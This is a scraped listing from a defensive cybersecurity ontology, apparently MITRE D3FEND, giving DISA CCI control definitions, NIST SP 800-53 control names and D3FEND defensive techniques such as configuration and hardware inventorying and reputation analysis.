  • "The organization employs a deny-all, permit-by-exception policy to allow the execution of authorized software programs on the information system."

rdfs:label

  • "CCI-001774"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system alerts organization-defined personnel or roles when the unauthorized installation of software is detected."

rdfs:label

  • "CCI-001811"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system prohibits user installation of software without explicit privileged status."

rdfs:label

  • "CCI-001812"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system enforces access restrictions."

rdfs:label

  • "CCI-001813"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system provides a warning to organization-defined personnel, roles, and/or locations within an organization-defined time period when allocated audit record storage volume reaches an organization-defined percentage of repository maximum audit record storage capacity."

rdfs:label

  • "CCI-001855"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system provides a real-time alert in an organization-defined real-time period to organization-defined personnel, roles, and/or locations when organization-defined audit failure events requiring real-time alerts occur."

rdfs:label

  • "CCI-001858"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system implements multifactor authentication for network access to privileged accounts such that one of the factors is provided by a device separate from the system gaining access."

rdfs:label

  • "CCI-001936"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The device used in the information system implementation of multifactor authentication for network access to privileged accounts meets organization-defined strength of mechanism requirements."

rdfs:label

  • "CCI-001937"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system implements replay-resistant authentication mechanisms for network access to privileged accounts."

rdfs:label

  • "CCI-001941"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system accepts Personal Identity Verification (PIV) credentials."

rdfs:label

  • "CCI-001953"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system electronically verifies Personal Identity Verification (PIV) credentials."

rdfs:label

  • "CCI-001954"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system implements organization-defined out-of-band authentication under organization-defined conditions."

rdfs:label

  • "CCI-001957"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system, for PKI-based authentication, implements a local cache of revocation data to support path discovery and validation in case of inability to access revocation information via the network."

rdfs:label

  • "CCI-001991"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system, for biometric-based authentication, employs mechanisms that satisfy organization-defined biometric quality requirements."

rdfs:label

  • "CCI-002005"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system accepts Personal Identity Verification (PIV) credentials from other federal agencies."

rdfs:label

  • "CCI-002009"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system electronically verifies Personal Identity Verification (PIV) credentials from other federal agencies."

rdfs:label

  • "CCI-002010"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system accepts Personal Identity Verification-I (PIV-I) credentials."

rdfs:label

  • "CCI-002015"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system electronically verifies Personal Identity Verification-I (PIV-I) credentials."

rdfs:label

  • "CCI-002016"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system allows the use of a temporary password for system logons with an immediate change to a permanent password."

rdfs:label

  • "CCI-002041"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system enforces organization-defined circumstances and/or usage conditions for organization-defined information system accounts."

rdfs:label

  • "CCI-002145"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system enforces organization-defined discretionary access control policies over defined subjects and objects."

rdfs:label

  • "CCI-002165"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system enforces a role-based access control policy over defined subjects and objects."

rdfs:label

  • "CCI-002169"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system enforces the revocation of access authorizations resulting from changes to the security attributes of subjects based on organization-defined rules governing the timing of revocations of access authorizations."

rdfs:label

  • "CCI-002178"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system enforces the revocation of access authorizations resulting from changes to the security attributes of objects based on organization-defined rules governing the timing of revocations of access authorizations."

rdfs:label

  • "CCI-002179"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system, when transferring information between different security domains, uses organization-defined data type identifiers to validate data essential for information flow decisions."

rdfs:label

  • "CCI-002201"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system uniquely identifies and authenticates source by organization, system, application, and/or individual for information transfer."

rdfs:label

  • "CCI-002205"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system uniquely identifies and authenticates destination by organization, system, application, and/or individual for information transfer."

rdfs:label

  • "CCI-002207"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system, when transferring information between different security domains, applies the same security policy filtering to metadata as it applies to data payloads."

rdfs:label

  • "CCI-002211"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system provides access from a single device to computing platforms, applications, or data residing on multiple different security domains, while preventing any information flow between the different security domains."

rdfs:label

  • "CCI-002218"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system prevents organization-defined software from executing at higher privilege levels than users executing the software."

rdfs:label

  • "CCI-002233"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system prevents non-privileged users from executing privileged functions to include disabling, circumventing, or altering implemented security safeguards/countermeasures."

rdfs:label

  • "CCI-002235"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system automatically locks the account or node for either an organization-defined time period, until the locked account or node is released by an administrator, or delays the next logon prompt according to the organization-defined delay algorithm when the maximum number of unsuccessful logon attempts is exceeded."

rdfs:label

  • "CCI-002238"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization provides the means to associate organization-defined types of security attributes having organization-defined security attribute values with information in storage."

rdfs:label

  • "CCI-002262"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The organization provides the means to associate organization-defined types of security attributes having organization-defined security attribute values with information in process."

rdfs:label

  • "CCI-002263"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The organization provides the means to associate organization-defined types of security attributes having organization-defined security attribute values with information in transmission."

rdfs:label

  • "CCI-002264"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system dynamically associates security attributes with organization-defined objects in accordance with organization-defined security policies as information is created and combined."

rdfs:label

  • "CCI-002272"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system provides authorized individuals (or processes acting on behalf of individuals) the capability to define the value of associated security attributes."

rdfs:label

  • "CCI-002277"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system maintains the association of organization-defined security attributes to organization-defined subjects."

rdfs:label

  • "CCI-002281"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system maintains the association of organization-defined security attributes to organization-defined objects."

rdfs:label

  • "CCI-002282"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system maintains the integrity of organization-defined security attributes associated with organization-defined subjects."

rdfs:label

  • "CCI-002283"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system maintains the integrity of organization-defined security attributes associated with organization-defined objects."

rdfs:label

  • "CCI-002284"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system supports the association of organization-defined security attributes with organization-defined subjects by authorized individuals (or processes acting on behalf of individuals)."

rdfs:label

  • "CCI-002289"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system supports the association of organization-defined security attributes with organization-defined objects by authorized individuals (or processes acting on behalf of individuals)."

rdfs:label

  • "CCI-002290"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system implements organization-defined techniques or technologies with an organization-defined level of assurance in associating security attributes to information."

rdfs:label

  • "CCI-002302"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system provides authorized individuals the capability to define or change the type of security attributes available for association with subjects."

rdfs:label

  • "CCI-002306"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system provides authorized individuals the capability to define or change the value of security attributes available for association with subjects."

rdfs:label

  • "CCI-002307"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system provides authorized individuals the capability to define or change the type of security attributes available for association with objects."

rdfs:label

  • "CCI-002308"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system provides authorized individuals the capability to define or change the value of security attributes available for association with objects."

rdfs:label

  • "CCI-002309"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The organization provides the capability to expeditiously disconnect or disable remote access to the information system within the organization-defined time period."

rdfs:label

  • "CCI-002322"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization employs organization-defined data mining prevention techniques for organization-defined data storage objects to adequately protect against data mining."

rdfs:label

  • "CCI-002346"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The organization employs organization-defined data mining detection techniques for organization-defined data storage objects to adequately detect data mining attempts."

rdfs:label

  • "CCI-002347"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system transmits organization-defined access authorization information using organization-defined security safeguards to organization-defined information systems which enforce access control decisions."

rdfs:label

  • "CCI-002353"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system enforces access control decisions based on organization-defined security attributes that do not include the identity of the user or process acting on behalf of the user."

rdfs:label

  • "CCI-002355"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system implements a reference monitor for organization-defined access control policies that is tamperproof."

rdfs:label

  • "CCI-002357"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system implements a reference monitor for organization-defined access control policies that is always invoked."

rdfs:label

  • "CCI-002358"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system implements a reference monitor for organization-defined access control policies that is small enough to be subject to analysis and testing, the completeness of which can be assured."

rdfs:label

  • "CCI-002359"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system automatically terminates a user session after organization-defined conditions or trigger events requiring session disconnect."

rdfs:label

  • "CCI-002361"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system provides a logout capability for user-initiated communications sessions whenever authentication is used to gain access to organization-defined information resources."

rdfs:label

  • "CCI-002363"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system displays an explicit logout message to users indicating the reliable termination of authenticated communications sessions."

rdfs:label

  • "CCI-002364"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization minimizes the number of nonsecurity functions included within the isolation boundary containing security functions."

rdfs:label

  • "CCI-002381"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The organization implements security functions as largely independent modules that maximize internal cohesiveness within modules and minimize coupling between modules."

rdfs:label

  • "CCI-002382"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system prevents unauthorized information transfer via shared resources in accordance with organization-defined procedures when system processing explicitly switches between different information classification levels or security categories."

rdfs:label

  • "CCI-002384"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system protects against or limits the effects of organization-defined types of denial of service attacks by employing organization-defined security safeguards."

rdfs:label

  • "CCI-002385"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system protects the availability of resources by allocating organization-defined resources based on priority, quota, and/or organization-defined security safeguards."

rdfs:label

  • "CCI-002394"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system, in conjunction with a remote device, prevents the device from simultaneously establishing non-remote connections with the system and communicating via some other connection to resources in external networks."

rdfs:label

  • "CCI-002397"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system audits the identity of internal users associated with denied outgoing communications traffic posing a threat to external information systems."

rdfs:label

  • "CCI-002400"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system only allows incoming communications from organization-defined authorized sources routed to organization-defined authorized destinations."

rdfs:label

  • "CCI-002403"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system blocks both inbound and outbound communications traffic between organization-defined communication clients that are independently configured by end users and external service providers."

rdfs:label

  • "CCI-002409"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system provides the capability to dynamically isolate/segregate organization-defined information system components from other components of the system."

rdfs:label

  • "CCI-002411"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system maintains the confidentiality and/or integrity of information during preparation for transmission."

rdfs:label

  • "CCI-002420"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system implements cryptographic mechanisms to prevent unauthorized disclosure of information and/or detect changes to information during transmission unless otherwise protected by organization-defined alternative physical safeguards."

rdfs:label

  • "CCI-002421"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system maintains the confidentiality and/or integrity of information during reception."

rdfs:label

  • "CCI-002422"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system implements cryptographic mechanisms to protect message externals (e.g., message headers and routing information) unless otherwise protected by organization-defined alternative physical safeguards."

rdfs:label

  • "CCI-002423"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system implements cryptographic mechanisms to conceal or randomize communication patterns unless otherwise protected by organization-defined alternative physical safeguards."

rdfs:label

  • "CCI-002425"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system provides a trusted communications path that is logically isolated and distinguishable from other paths."

rdfs:label

  • "CCI-002426"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system enforces organization-defined actions prior to executing mobile code."

rdfs:label

  • "CCI-002460"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system provides additional data integrity verification artifacts along with the authoritative name resolution data the system returns in response to external name/address resolution queries."

rdfs:label

  • "CCI-002462"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system provides data origin artifacts for internal name/address resolution queries."

rdfs:label

  • "CCI-002463"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system provides data integrity protection artifacts for internal name/address resolution queries."

rdfs:label

  • "CCI-002464"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system requests data origin authentication verification on the name/address resolution responses the system receives from authoritative sources."

rdfs:label

  • "CCI-002465"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system requests data integrity verification on the name/address resolution responses the system receives from authoritative sources."

rdfs:label

  • "CCI-002466"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system performs data integrity verification on the name/address resolution responses the system receives from authoritative sources."

rdfs:label

  • "CCI-002467"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system performs data origin verification authentication on the name/address resolution responses the system receives from authoritative sources."

rdfs:label

  • "CCI-002468"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system only allows the use of organization-defined certificate authorities for verification of the establishment of protected sessions."

rdfs:label

  • "CCI-002470"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system implements cryptographic mechanisms to prevent unauthorized modification of organization-defined information at rest on organization-defined information system components."

rdfs:label

  • "CCI-002475"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system implements cryptographic mechanisms to prevent unauthorized disclosure of organization-defined information at rest on organization-defined information system components."

rdfs:label

  • "CCI-002476"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system maintains a separate execution domain for each executing process."

rdfs:label

  • "CCI-002530"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system implements underlying hardware separation mechanisms to facilitate process separation."

rdfs:label

  • "CCI-002531"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system maintains a separate execution domain for each thread in organization-defined multi-threaded processing."

rdfs:label

  • "CCI-002533"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system protects organization-defined external and internal wireless links from organization-defined types of signal parameter attacks or references to sources for such attacks."

rdfs:label

  • "CCI-002536"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The organization physically disables or removes organization-defined connection ports or input/output devices on organization-defined information systems or information system components."

rdfs:label

  • "CCI-002546"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The organization installs security-relevant software updates within an organization-defined time period of the release of the updates."

rdfs:label

  • "CCI-002605"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization installs security-relevant firmware updates within an organization-defined time period of the release of the updates."

rdfs:label

  • "CCI-002607"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization installs organization-defined security-relevant software updates automatically to organization-defined information system components."

rdfs:label

  • "CCI-002613"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization installs organization-defined security-relevant firmware updates automatically to organization-defined information system components."

rdfs:label

  • "CCI-002614"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization removes organization-defined software components (e.g., previous versions) after updated versions have been installed."

rdfs:label

  • "CCI-002617"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The organization removes organization-defined firmware components (e.g., previous versions) after updated versions have been installed."

rdfs:label

  • "CCI-002618"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system detects organization-defined unauthorized operating system commands through the kernel application programming interface at organization-defined information system hardware components."

rdfs:label

  • "CCI-002630"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system issues a warning, audits the command execution, or prevents the execution of the command when organization-defined unauthorized operating system commands are detected."

rdfs:label

  • "CCI-002631"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system monitors inbound communications traffic per organization-defined frequency for unusual or unauthorized activities or conditions."

rdfs:label

  • "CCI-002661"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system monitors outbound communications traffic per organization-defined frequency for unusual or unauthorized activities or conditions."

rdfs:label

  • "CCI-002662"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system audits and/or alerts organization-defined personnel when unauthorized network services are detected."

rdfs:label

  • "CCI-002684"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system discovers indicators of compromise."

rdfs:label

  • "CCI-002688"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system collects indicators of compromise."

rdfs:label

  • "CCI-002689"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system distributes indicators of compromise."

rdfs:label

  • "CCI-002690"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system uses indicators of compromise."

rdfs:label

  • "CCI-002691"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system performs an integrity check of organization-defined software at startup, at organization-defined transitional states or security-relevant events, or on an organization-defined frequency."

rdfs:label

  • "CCI-002710"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system performs an integrity check of organization-defined firmware at startup, at organization-defined transitional states or security-relevant events, or on an organization-defined frequency."

rdfs:label

  • "CCI-002711"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system performs an integrity check of organization-defined information at startup, at organization-defined transitional states or security-relevant events, or on an organization-defined frequency."

rdfs:label

  • "CCI-002712"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system automatically shuts the information system down, restarts the information system, and/or implements organization-defined security safeguards when integrity violations are discovered."

rdfs:label

  • "CCI-002715"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system implements cryptographic mechanisms to detect unauthorized changes to software."

rdfs:label

  • "CCI-002716"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system implements cryptographic mechanisms to detect unauthorized changes to firmware."

rdfs:label

  • "CCI-002717"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system implements cryptographic mechanisms to detect unauthorized changes to information."

rdfs:label

  • "CCI-002718"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system, upon detection of a potential integrity violation, provides the capability to audit the event."

rdfs:label

  • "CCI-002723"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system, upon detection of a potential integrity violation, initiates one or more of the following actions: generates an audit record; alerts the current user; alerts organization-defined personnel or roles; and/or organization-defined other actions."

rdfs:label

  • "CCI-002724"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system verifies the integrity of the boot process of organization-defined devices."

rdfs:label

  • "CCI-002726"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system implements organization-defined security safeguards to protect the integrity of boot firmware in organization-defined devices."

rdfs:label

  • "CCI-002729"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system implements cryptographic mechanisms to authenticate organization-defined software or firmware components prior to installation."

rdfs:label

  • "CCI-002740"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system implements spam protection mechanisms with a learning capability to more effectively identify legitimate communications traffic."

rdfs:label

  • "CCI-002743"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system provides a manual override capability for input validation of organization-defined inputs."

rdfs:label

  • "CCI-002746"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system restricts the use of the manual override capability to only organization-defined authorized individuals."

rdfs:label

  • "CCI-002748"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system audits the use of the manual override capability."

rdfs:label

  • "CCI-002749"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system validates information output from organization-defined software programs and/or applications to ensure that the information is consistent with the expected content."

rdfs:label

  • "CCI-002771"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system implements organization-defined security safeguards to protect its memory from unauthorized code execution."

rdfs:label

  • "CCI-002824"

'date published'

broader

contributor

member-of

Usage (5)

definition

  • "The information system restricts the use of maintenance tools to authorized personnel only."

rdfs:label

  • "CCI-002883"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system implements cryptographic mechanisms to protect the integrity of nonlocal maintenance and diagnostic communications."

rdfs:label

  • "CCI-002890"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system implements remote disconnect verification at the termination of nonlocal maintenance and diagnostic sessions."

rdfs:label

  • "CCI-002891"

'date published'

contributor

member-of

narrower

Usage (5)

definition

  • "The information system enforces organization-defined mandatory access control policies over all subjects and objects."

rdfs:label

  • "CCI-003014"

'date published'

contributor

exactly

member-of

Usage (5)

definition

  • "The information system implements cryptographic mechanisms to protect the confidentiality of nonlocal maintenance and diagnostic communications."

rdfs:label

  • "CCI-003123"

'date published'

contributor

member-of

narrower

Usage (5)

rdfs:label

  • "CCI Catalog v2022-04-05"

rdfs:seeAlso

archived-at

has-member

version

  • "2022-04-05"

Usage (5)

definition

  • "A network agent is software installed on a network node or device that transmits information back to a collector agent or management system. Kinds of network agents include SNMP Agent, IPMI agents, WBEM agents, and many proprietary agents capturing network monitoring and management information."

rdfs:label

  • "Network Agent"

synonym

  • "Exporter"

Usage (5)

rdfs:label

  • "Configuration Database"

contains

Usage (5)

rdfs:label

  • "Configuration Database Record"

synonym

  • "Configuration Record"

Usage (5)

definition

  • "Configuration inventory identifies and records the configuration of software and hardware and their components throughout the organization."

kb-article

  • "## How it works

    The organization retrieves configuration information through means of SNMP (MIB records), WBEM (CIM records), other protocols, or custom scripts and captures that information in a repository, typically known as a Configuration Management Database (CMDB).""

rdfs:label

  • "Configuration Inventory"

d3fend-id

  • "D3-CI"

inventories

kb-reference

Usage (5)

comment

  • "A resource used to configure a system including software and hardware."

rdfs:label

  • "Configuration Resource"

Usage (5)

comment

  • "A create socket system call creates an endpoint for communication and returns a file descriptor that refers to that endpoint."

rdfs:label

  • "Create Socket"

rdfs:seeAlso

  • https://www.man7.org/linux/man-pages/man2/socket.2.html

Usage (5)

comment

  • "D3FEND things are concepts defined in the core D3FEND Framework."

rdfs:label

  • "D3FEND Thing"

Usage (5)

comment

  • "Defense Information Systems Agency (DISA) Field Security Office (FSO)"

rdfs:label

  • "DISA FSO"

Usage (5)

rdfs:label

  • "Data Dependency"

synonym

  • "Transactional Dependency"

Usage (5)

definition

  • "Data exchange mapping identifies and models the organization's intended design for the flows of the data types, formats, and volumes between systems at the application layer."

rdfs:label

  • "Data Exchange Mapping"

synonym

  • "Data Flow Mapping"
  • "Information Exchange Mapping"

d3fend-id

  • "D3-DEM"

kb-reference

maps

Usage (5)

definition

  • "Data inventorying identifies and records the schemas, formats, volumes, and locations of data stored and used on the organization's architecture."

rdfs:label

  • "Data Inventory"

synonym

  • "Data Discovery"
  • "Data Inventorying"

d3fend-id

  • "D3-DI"

inventories

kb-reference

Usage (5)

rdfs:label

  • "Database File"

Usage (5)

comment

  • "A dependency is the relationship of relying on or being controlled by someone or something else. This class reifies dependencies that correspond to the object property depends-on."

rdfs:label

  • "Dependency"

rdfs:seeAlso

dependent

provider

Usage (5)

comment

  • "A digital system is a group of interacting or interrelated digital artifacts that act according to a set of rules to form a unified whole. A digital system, surrounded and influenced by its environment, is described by its boundaries, structure and purpose and expressed in its functioning. Systems are the subjects of study of systems theory."

rdfs:label

  • "Digital System"

rdfs:seeAlso

  • http://dbpedia.org/resource/System

Usage (5)

definition

  • "Analyzing the reputation of a domain name."

rdfs:label

  • "Domain Name Reputation Analysis"

analyzes

d3fend-id

  • "D3-DNRA"

kb-reference

Usage (5)

'has icon'

  • "file-hash.svg"

rdfs:label

  • "File Hash"

identifies

Usage (5)

definition

  • "Analyzing the reputation of a file hash."

rdfs:label

  • "File Hash Reputation Analysis"

analyzes

d3fend-id

  • "D3-FHRA"

kb-reference

Usage (5)

isDefinedBy

Usage (5)

rdfs:label

  • "Get Open Sockets"

Usage (5)

rdfs:label

  • "Get Open Windows"

Usage (5)

rdfs:label

  • "Get Running Processes"

Usage (5)

rdfs:label

  • "Get Screen Capture"

Usage (5)

rdfs:label

  • "Get System Config Value"

rdfs:seeAlso

Usage (5)

rdfs:label

  • "Get System Network Config Value"

Usage (5)

definition

  • "Hardware component inventorying identifies and records the hardware items in the organization's architecture."

kb-article

  • "## How it works
    Administrators collect information on hardware devices such as peripherals, NICs, processors, and memory devices that are components of the computers in their architecture using a variety of administrative and management tools that query for this information. In some cases, where such queries are not supported or provide specific information of interest, an administrator may also collect this information through remote adminstration tools and system commands, either manually or using scripts.

    ## Considerations
    * Scanning and probing techniques using mapping tools can result in side effects to information technology (IT) and operational technology (OT) systems.
    * An adversary conducting network enumeration may engage in activities that parallel normal hardware inventorying activities, but would require escalating to admin privileges for most of the operations requiting administrative tools

    ## Examples
    * Bus discovery
    * Admin-scripted PCI Bus inventory using ssh and pciutils
    * Application-layer discovery
    * Simple Network Management Protocol (SNMP) collects MIB information
    * Web-based Enterprise Management (WBEM) collects CIM information
    * Windows Management Instrumentation (WMI)
    * Windows Management Infrastructure (MI)"

rdfs:label

  • "Hardware Component Inventory"

synonym

  • "Hardware Component Discovery"
  • "Hardware Component Inventorying"

d3fend-id

  • "D3-HCI"

inventories

kb-reference

Usage (5)

comment

  • "An Internet Protocol address (IP address) is a numerical label assigned to each device connected to a computer network that uses the Internet Protocol for communication.An IP address serves two main functions: host or network interface identification and location addressing. Internet Protocol version 4 (IPv4) defines an IP address as a 32-bit number. However, because of the growth of the Internet and the depletion of available IPv4 addresses, a new version of IP (IPv6), using 128 bits for the IP address, was standardized in 1998. IPv6 deployment has been ongoing since the mid-2000s."

isDefinedBy

  • http://dbpedia.org/resource/IP_address

rdfs:label

  • "IP Address"

identifies

Usage (5)

definition

  • "Analyzing the reputation of an IP address."

rdfs:label

  • "IP Reputation Analysis"

analyzes

d3fend-id

  • "D3-IPRA"

kb-reference

Usage (5)

definition

  • "Analyzing the reputation of an identifier."

rdfs:label

  • "Identifier Reputation Analysis"

d3fend-id

  • "D3-IRA"

kb-reference

Usage (5)

rdfs:label

  • "Logical Link"

Usage (5)

definition

  • "Logical link mapping creates a model of existing or previous node-to-node connections using network-layer data or metadata."

rdfs:label

  • "Logical Link Mapping"

d3fend-id

  • "D3-LLM"

kb-reference

maps

Usage (5)

definition

  • "The model tactic is used to apply security engineering, vulnerability, threat, and risk analyses to digital systems. This is accomplished by creating and maintaining a common understanding of the systems being defended, the operations on those systems, actors using the systems, and the relationships and interactions between these elements."

display-priority

  • 1

rdfs:label

  • "Model"

display-order

  • -1

Usage (5)

comment

  • "Digital video files which often contain audio."

rdfs:label

  • "Multimedia Document File"

rdfs:seeAlso

Usage (5)

rdfs:label

  • "NIST SP 800-53 R3"

rdfs:seeAlso

archived-at

version

  • 3

Usage (5)

rdfs:label

  • "NIST SP 800-53 R4"

rdfs:seeAlso

archived-at

version

  • 4

Usage (5)

rdfs:label

  • "NIST SP 800-53 R5"

rdfs:seeAlso

archived-at

has-member

version

  • 5

Usage (5)

rdfs:label

  • "AC-17(8)"

broader

control-name

  • "Remote Access | Disable Nonsecure Network Protocols"

member-of

Usage (5)

rdfs:label

  • "AC-23"

control-name

  • "Data Mining Protection"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-24"

control-name

  • "Access Control Decisions"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-24(1)"

control-name

  • "Access Control Decisions | Transmit Access Authorization Information"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-24(2)"

control-name

  • "Access Control Decisions | No User or Process Identity"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-2(1)"

broader

control-name

  • "Account Management | Automated System Account Management"

member-of

Usage (5)

rdfs:label

  • "AC-2(13)"

control-name

  • "Account Management | Disable Accounts for High-risk Individuals"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-2(2)"

broader

control-name

  • "Account Management | Automated Temporary and Emergency Account Management"

member-of

Usage (5)

rdfs:label

  • "AC-2(3)"

broader

control-name

  • "Account Management | Disable Accounts"

member-of

Usage (5)

rdfs:label

  • "AC-2(4)"

control-name

  • "Account Management | Automated Audit Actions"

member-of

Usage (5)

rdfs:label

  • "AC-2(5)"

control-name

  • "Account Management | Inactivity Logout"

member-of

Usage (5)

rdfs:label

  • "AC-2(6)"

broader

control-name

  • "Account Management | Dynamic Privilege Management"

member-of

Usage (5)

rdfs:label

  • "AC-2(7)"

control-name

  • "Account Management | Privileged User Accounts"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-2(9)"

control-name

  • "Account Management | Restrictions on Use of Shared and Group Accounts"

member-of

narrower

Usage (5)

rdfs:label

  • "AC-3"

control-name

  • "Access Enforcement"

member-of

narrower

Usage (5)

